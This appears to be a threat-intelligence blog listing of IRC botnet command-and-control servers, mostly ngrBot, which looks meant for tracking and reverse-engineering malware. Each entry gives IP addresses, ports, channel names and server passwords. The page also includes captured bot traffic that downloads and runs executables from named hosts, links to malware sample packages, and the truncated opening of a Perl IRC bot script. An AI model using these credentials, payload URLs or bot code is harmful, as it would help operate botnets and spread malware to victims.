Remote Host Port Number 64.32.28.19 6667 USER ^GCIeq`{TehIQ[yuE ^GCIeq`{TehIQ[yuE “^GCIeq`{TehIQ[yuE” :^GCIeq`{TehIQ[yuE NICK ^GCIeq`{TehIQ[yuE PONG 422 JOIN #ib :insbt PRIVMSG #ib :keylogger enabled hosting infos: http://whois.domaintools.com/64.32.28.19
90mb malware samples
another package with 90mb malware samples have fun reversing Download: http://e12ade83.urlbeat.net
216.245.202.52(linux bot hosted in United States Limestone Networks Inc)
here the bot used from heckers: #!/usr/bin/perl ################################################ use HTTP::Request; # use HTTP::Request::Common; # use HTTP::Request::Common qw(POST); # use LWP::Simple; # use LWP 5.53; # use LWP::UserAgent; # use Socket; # use IO::Socket; # use IO::Socket::INET; # use IO::Select; # use MIME::Base64; # ################################################ my $datetime = localtime; my $fakeproc = "/usr/sbin/apache2 -k start"; myRead more...
68.53.67.92(ngrBot hosted in United States Murfreesboro Comcast Cable Communications Inc)
Remote Host Port Number 199.15.234.7 80 68.53.67.92 6667 PASS .. NICK n{US|XPa}uqslazq USER uqslazq 0 0 :uqslazq PONG :9D3E1772 JOIN #!hot ngrBot Now talking in #!hot Topic On: [ #!hot ] [ !mdns http://data.fuskbugg.se/skalman02/4e28ae2064f07_av.txt -n ] Topic By: [ qwerty ] Modes On: [ #!hot ] [ +smntMu ] Quits: qwerty [qwerty@netadmin.ownage.net] (Quit:) heckers inside:Read more...
75.127.109.65(ngrBot hosted in United States Atlanta Global Net Access Llc)
Remote Host Port Number 199.15.234.7 80 75.127.109.65 1863 PASS ngrBot 95.211.0.131 1863 PASS ngrBot 69.64.33.227 1863 PASS ngrBot NICK n{US|XPa}wskgolo USER wskgolo 0 0 :wskgolo NICK n{US|XPa}bkwgsru USER bkwgsru 0 0 :bkwgsru NICK n{US|XPa}golxkxh USER golxkxh 0 0 :golxkxh NICK n{US|XPa}axiziqh USER axiziqh 0 0 :axiziqh to find possible chanels search in the blog forRead more...
60.165.98.198(irc botnet hosted in China Gansu Chinanet Gansu Province Network)
server:60.165.98.198:8680 ircd is protected and i dont have the exe file to know more about chanels etc have fun searching
184.105.71.155(irc botnet hosted in United States Hurricane Electric Inc)
Remote Host Port Number 184.105.71.155 6667 JOIN #1q2w3e4r MODE jrpthu +i PING acool.ca.us.dal.net hosting infos: http://whois.domaintools.com/184.105.71.155
109.68.191.168(ngrBot hosted in Russian Federation Moscow Jsc Tel Company)
Remote Host Port Number 109.68.191.168 7654 PASS ngrBot 199.15.234.7 80 74.52.121.37 80 NICK n{US|XPa}woqkvpd USER woqkvpd 0 0 :woqkvpd JOIN #oldgold noKIDs JOIN #US PRIVMSG #oldgold :[d=”http://muralihostal.com/clientes/fu66.exe” s=”7455 bytes”] Update error: MD5 mismatch (5B6D6ED8BFC9B90BF020566BED59FB14 != 00bbd4ef64ffca28833b1d173b29c3e6) * The data identified by the following URLs was then requested from the remote web server: o http://api.wipmania.com/ oRead more...
69.162.69.2(ngrBot hosted in United States Pacoima Limestone Networks Inc)
Server: 69.162.69.2:1685 PASS koka25 Server Password: Username: ivpuufd Nickname: n{DE|XPa}ivpuufd Channel: #infe (Password: koka25) JOIN #US Channeltopic: :!us pa !s hosting infos: http://whois.domaintools.com/69.162.69.2
109.68.191.185(ngrBot hosted in Russian Federation Moscow Jsc Tel Company)
Remote Host Port Number 109.68.191.185 7777 PASS laekin0505x 199.115.229.189 80 199.15.234.7 80 NICK n{US|XPa}lwndarv USER lwndarv 0 0 :lwndarv JOIN #totalrenovation2011 ngrBot PRIVMSG #totalrenovation2011 :[d=”http://juazjuaz.com/cipha.exe” s=”114688 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.exe” – Download retries: 0 PRIVMSG #totalrenovation2011 :[d=”http://juazjuaz.com/Winsoft.exe” s=”167936 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataMcxaxm.exe” – Download retries: 0 * TheRead more...